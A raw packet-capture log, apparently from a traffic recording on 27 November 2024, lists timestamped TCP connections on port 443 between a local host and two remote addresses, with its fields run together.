                                                  Nov 27, 2024 18:10:17.376960039 CET49859443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:17.377011061 CET49860443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:17.377176046 CET49860443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:17.377181053 CET49859443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:17.377191067 CET4434986013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:17.377192020 CET4434985913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:17.735075951 CET4434985613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:17.738435030 CET4434985613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:17.738557100 CET49856443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:17.741246939 CET49856443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:17.741266966 CET4434985613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:17.741278887 CET49856443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:17.741285086 CET4434985613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:17.744396925 CET49861443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:17.744453907 CET4434986113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:17.744550943 CET49861443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:17.744690895 CET49861443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:17.744704962 CET4434986113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.132189989 CET4434985713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.132757902 CET49857443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:18.132824898 CET4434985713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.133356094 CET49857443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:18.133371115 CET4434985713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.199872017 CET4434985813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.200284958 CET49858443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:18.200304985 CET4434985813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.200798035 CET49858443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:18.200803041 CET4434985813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.574213982 CET4434985713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.577198029 CET4434985713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.577241898 CET4434985713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.577270031 CET49857443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:18.577327013 CET49857443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:18.577389956 CET49857443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:18.577419043 CET4434985713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.577435970 CET49857443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:18.577444077 CET4434985713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.580568075 CET49862443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:18.580610037 CET4434986213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.580688000 CET49862443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:18.580849886 CET49862443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:18.580868006 CET4434986213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.699737072 CET4434985813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.702749968 CET4434985813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.702841043 CET49858443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:18.702882051 CET49858443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:18.702893972 CET4434985813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.702904940 CET49858443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:18.702909946 CET4434985813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.706002951 CET49863443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:18.706038952 CET4434986313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:18.706104040 CET49863443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:18.706290007 CET49863443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:18.706300020 CET4434986313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.256567955 CET4434986013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.257240057 CET49860443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.257256985 CET4434986013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.257749081 CET49860443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.257754087 CET4434986013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.294620991 CET4434985913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.295171976 CET49859443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.295233965 CET4434985913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.295653105 CET49859443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.295667887 CET4434985913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.544734001 CET4434986113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.545372963 CET49861443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.545401096 CET4434986113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.545871973 CET49861443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.545876980 CET4434986113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.663602114 CET49864443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:10:19.663630962 CET4434986420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:10:19.663702011 CET49864443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:10:19.664083004 CET49864443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:10:19.664098024 CET4434986420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:10:19.822870016 CET4434986013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.825923920 CET4434986013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.826020956 CET49860443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.826050043 CET49860443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.826066971 CET4434986013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.826101065 CET49860443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.826106071 CET4434986013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.828943968 CET49865443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.828989029 CET4434986513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.829060078 CET49865443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.829195976 CET49865443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.829210043 CET4434986513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.841717958 CET4434985913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.844944954 CET4434985913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.845024109 CET49859443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.845092058 CET49859443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.845092058 CET49859443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.845148087 CET4434985913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.845175028 CET4434985913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.847372055 CET49866443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.847412109 CET4434986613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.847469091 CET49866443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.847577095 CET49866443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.847588062 CET4434986613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.988713980 CET4434986113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.992750883 CET4434986113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.992791891 CET4434986113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.992816925 CET49861443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.992873907 CET49861443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.992980003 CET49861443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.992993116 CET4434986113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.993027925 CET49861443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.993032932 CET4434986113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.995223999 CET49867443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.995251894 CET4434986713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:19.995326996 CET49867443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.995424986 CET49867443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:19.995440960 CET4434986713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:20.474741936 CET4434986313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:20.475234985 CET49863443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:20.475260019 CET4434986313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:20.475730896 CET49863443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:20.475735903 CET4434986313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:20.628937960 CET4434986213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:20.629528046 CET49862443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:20.629553080 CET4434986213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:20.630034924 CET49862443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:20.630039930 CET4434986213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:20.920177937 CET4434986313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:20.923409939 CET4434986313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:20.923474073 CET49863443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:20.923635006 CET49863443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:20.923635006 CET49863443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:20.923659086 CET4434986313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:20.923669100 CET4434986313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:20.927198887 CET49868443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:20.927242994 CET4434986813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:20.927509069 CET49868443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:20.928014994 CET49868443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:20.928026915 CET4434986813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:21.095654011 CET4434986213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:21.095962048 CET4434986213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:21.096133947 CET49862443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:21.096133947 CET49862443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:21.096134901 CET49862443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:21.099844933 CET49869443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:21.099879980 CET4434986913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:21.099955082 CET49869443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:21.100141048 CET49869443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:21.100152016 CET4434986913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:21.330708027 CET4434986420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:10:21.330929995 CET49864443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:10:21.335032940 CET49864443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:10:21.335045099 CET4434986420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:10:21.335283041 CET4434986420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:10:21.344063997 CET49864443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:10:21.387331009 CET4434986420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:10:21.409374952 CET49862443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:21.409398079 CET4434986213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:21.733263016 CET4434986613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:21.733985901 CET49866443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:21.734009027 CET4434986613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:21.734067917 CET4434986513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:21.734318972 CET49865443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:21.734344006 CET4434986513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:21.734409094 CET49866443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:21.734412909 CET4434986613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:21.734790087 CET49865443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:21.734796047 CET4434986513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:21.876270056 CET4434986713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:21.877016068 CET49867443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:21.877038956 CET4434986713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:21.877388000 CET49867443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:21.877393961 CET4434986713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:21.995970011 CET4434986420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:10:21.996000051 CET4434986420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:10:21.996014118 CET4434986420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:10:21.996186018 CET49864443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:10:21.996212006 CET4434986420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:10:21.996268034 CET49864443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:10:22.037106991 CET4434986420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:10:22.037147999 CET4434986420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:10:22.037206888 CET4434986420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:10:22.037296057 CET49864443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:10:22.037296057 CET49864443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:10:22.037296057 CET49864443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:10:22.037372112 CET49864443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:10:22.037389994 CET4434986420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:10:22.037399054 CET49864443192.168.2.620.109.210.53
                                                  Nov 27, 2024 18:10:22.037404060 CET4434986420.109.210.53192.168.2.6
                                                  Nov 27, 2024 18:10:22.189385891 CET4434986513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.191128016 CET4434986613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.193684101 CET4434986513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.193744898 CET49865443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.193794966 CET49865443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.193814993 CET4434986513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.193828106 CET49865443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.193833113 CET4434986513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.194904089 CET4434986613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.194946051 CET4434986613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.194955111 CET49866443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.194992065 CET49866443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.195147038 CET49866443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.195167065 CET4434986613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.195179939 CET49866443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.195184946 CET4434986613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.198864937 CET49870443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.198901892 CET4434987013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.198966026 CET49870443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.199218035 CET49870443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.199234009 CET4434987013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.199582100 CET49871443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.199628115 CET4434987113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.199687958 CET49871443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.199810028 CET49871443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.199826956 CET4434987113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.482757092 CET4434986713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.482831001 CET4434986713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.482911110 CET49867443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.483191013 CET49867443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.483211040 CET4434986713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.483222961 CET49867443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.483227968 CET4434986713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.486474991 CET49872443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.486495018 CET4434987213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.486584902 CET49872443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.486754894 CET49872443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.486766100 CET4434987213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.794656038 CET4434986813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.795253038 CET49868443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.795283079 CET4434986813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.795774937 CET49868443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.795784950 CET4434986813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.883282900 CET4434986913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.883764982 CET49869443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.883797884 CET4434986913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:22.884181023 CET49869443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:22.884186983 CET4434986913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:23.260081053 CET4434986813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:23.263643980 CET4434986813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:23.263695955 CET49868443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:23.263700008 CET4434986813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:23.263765097 CET49868443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:23.263823986 CET49868443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:23.263842106 CET4434986813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:23.263853073 CET49868443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:23.263859987 CET4434986813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:23.266906023 CET49873443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:23.266947031 CET4434987313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:23.267040014 CET49873443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:23.267174006 CET49873443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:23.267194033 CET4434987313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:23.353246927 CET4434986913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:23.356096983 CET4434986913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:23.356169939 CET49869443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:23.356215954 CET49869443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:23.356231928 CET4434986913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:23.356246948 CET49869443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:23.356251955 CET4434986913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:23.359091043 CET49874443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:23.359118938 CET4434987413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:23.359183073 CET49874443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:23.359352112 CET49874443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:23.359364986 CET4434987413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:23.957386971 CET4434987113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:23.958012104 CET49871443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:23.958022118 CET4434987113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:23.958503962 CET49871443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:23.958508015 CET4434987113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.052875042 CET4434987013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.053484917 CET49870443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.053508043 CET4434987013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.053950071 CET49870443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.053960085 CET4434987013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.344741106 CET4434987213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.345446110 CET49872443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.345463037 CET4434987213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.345889091 CET49872443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.345892906 CET4434987213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.392443895 CET4434987113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.397011995 CET4434987113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.397110939 CET49871443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.397183895 CET49871443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.397205114 CET4434987113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.397216082 CET49871443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.397221088 CET4434987113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.400226116 CET49875443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.400271893 CET4434987513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.400374889 CET49875443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.400526047 CET49875443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.400537968 CET4434987513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.502146006 CET4434987013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.505635023 CET4434987013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.505743980 CET49870443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.505826950 CET49870443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.505855083 CET4434987013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.505866051 CET49870443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.505872965 CET4434987013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.509463072 CET49876443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.509510994 CET4434987613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.509623051 CET49876443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.509831905 CET49876443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.509840965 CET4434987613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.809724092 CET4434987213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.813685894 CET4434987213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.813745975 CET4434987213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.813766956 CET49872443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.813927889 CET49872443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.813927889 CET49872443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.814858913 CET49872443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.814881086 CET4434987213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.818090916 CET49878443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.818137884 CET4434987813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:24.818243027 CET49878443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.818443060 CET49878443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:24.818453074 CET4434987813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:25.133497953 CET4434987313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:25.134227991 CET49873443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:25.134247065 CET4434987313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:25.134742022 CET49873443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:25.134749889 CET4434987313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:25.217700958 CET4434987413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:25.218456030 CET49874443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:25.218471050 CET4434987413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:25.219043016 CET49874443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:25.219052076 CET4434987413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:25.923752069 CET4434987413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:25.926316023 CET4434987413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:25.926378012 CET49874443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:25.926590919 CET49874443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:25.926613092 CET4434987413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:25.926624060 CET49874443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:25.926629066 CET4434987413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:25.929934025 CET49879443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:25.929985046 CET4434987913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:25.930090904 CET49879443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:25.930286884 CET49879443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:25.930303097 CET4434987913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:26.126926899 CET4434987513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:26.127785921 CET49875443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:26.127804041 CET4434987513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:26.128349066 CET49875443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:26.128354073 CET4434987513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:26.311960936 CET4434987613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:26.312789917 CET49876443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:26.312835932 CET4434987613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:26.313173056 CET49876443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:26.313178062 CET4434987613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:26.582509041 CET4434987513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:26.582963943 CET4434987513.107.246.63192.168.2.6
